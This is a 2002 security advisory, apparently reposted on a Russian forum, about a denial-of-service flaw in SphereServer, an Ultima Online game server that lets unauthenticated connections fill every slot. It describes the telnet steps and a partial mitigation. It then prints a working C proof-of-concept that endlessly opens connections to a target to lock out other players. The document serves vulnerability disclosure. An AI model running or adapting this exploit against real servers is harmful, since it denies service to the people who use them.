Код:
H Zero Seven Security Advisory [15.02.2002] 
------------------------------------------- 

SphereServer Denial of Service Vulnerability 

-------------------------------------------- 

Summary: 

The SphereServer is an Ultima Online Roleplay Server 
(Multiplayer). Some people use this inofficial Server 
to host Free Roleplay Worlds for an large community of 
Players. The Developer of the Software is MenaSoft 
(www.menasoft.com). Thus no ip-limitation exists in 
the configuration so anyone can connect several times. 
The Problem is that an client can hold the connection 
without user-identification. So its possible to reach 
the maximum connection count and block other users. 


Affected Systems: 

Sphere99x - Linux, FreeBSD, Win32 

Possible affected: 

Sphere 0.5x 


Informations: 

The SphereServer user-auth is very simple and you can authenticate with telnet too. 

linentw:~ # telnet target 2593 
Trying target... 
Connected to target. 
Escape character is '^]'. 

[so at this point the sphereserver count you as an client]: 

90:Client connected [Total:1] from '10.0.0.112'. 

[now send an space and the sphereserver ask for the username] 

Username: _ 

[type username return and the password] 

cc:Login 'validusername'   <-- loged in and with the client you can play :) 


So the problem is that the server count you as an client still you 
connect and sent nothing to it. And do this several times until the 
max_connections reached, so the server blocks all new connections. 

linentw:~ # telnet target 2593 
Trying target... 
Connected to target. 
Escape character is '^]'. 
Maximum connections reached, please try it later 
Connection closed by foreign host. 

There is no true time_out variable in the configuration file and the death_socket 
function does not work correctly in sphere. The Vendor has been informed about this, 
but no answer. 

www.sphereserver.com 
www.menasoft.com 

Fix: 

no true fix available, but set the death_socket variable in the configuration to 3 
should help for the first time, even it does not work correctly (its like an 
dice-game). 


Disclaimer: 

This advisory does not claim to be complete. The informations may be inaccurate or 
wrong. Possible exploit code is only written for testing purposes. Articles based on 
informations in this advisory should have an link to this document. 


Exploit: 

/* 
* 
* www.h07.org 
* H Zero Seven 
* Unix Security Research Team 
* 
* Sphere Ultima Online Server - Denial of Service Vulnerability 
* poc-exploit... 
* 
* Simple code to eat all connections from the gameserver, so other 
* peoples could not connect to the server. 
*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <stdarg.h> 
#include <time.h> 
#include <sys/time.h> 

int Connect(int ip, int port) 
{ 
  int fd; 
  struct sockaddr_in tgt; 
   
  fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 
  if (fd<0) return -1; 
  memset(&tgt,0,sizeof(struct sockaddr_in)); 
  tgt.sin_port = htons(port); 
  tgt.sin_family = AF_INET; 
  tgt.sin_addr.s_addr = ip; 
  if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1; 
  return fd; 
} 

int sprint(int fd, const char *str,...) 
{ 
  va_list args; 
  char buf[4096]; 
  memset(&buf,0,sizeof(buf)); 
  va_start(args,str); 
  vsnprintf(buf,sizeof(buf),str,args); 
  return(write(fd,buf,strlen(buf))); 
} 

int main(int argc, char *argv[]) 
{ 
  int fd; 
  struct sockaddr_in box; 
   
  fprintf(stderr, "SphereServer DoS Exploit [poc]\n"); 
  fprintf(stderr, "H Zero Seven - Unix Security Research Team - www.h07.org\n\n"); 
  if (argc < 2) { 
     fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]); 
     return; 
  } 
   
  fprintf(stderr,"for the full advisory regarding this vulnerability visit 
www.h07.org ... \n"); 
  fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 
  if (fd<0) { 
     perror("socket() "); 
     return; 
  } 

  fprintf(stderr,"Attacking sphere : "); 
  for (;;) { 
     int sock; 
      
     sock = Connect(inet_addr(argv[1]),
(argc>2)?(atoi(argv[2])):3128); 
     if (sock<0) { 
        sleep(10); 
        continue; 
     } 
      fprintf(stderr, ".*"); 
  } 
} 



Reference: 

H Zero Seven - Unix/Linux Developer Team 
http://www.h07.org
Описание: Нет таймаута на соединение до проверки имени пользователя и ограничения числа коннектов с одного IP.
Опасность: 9/10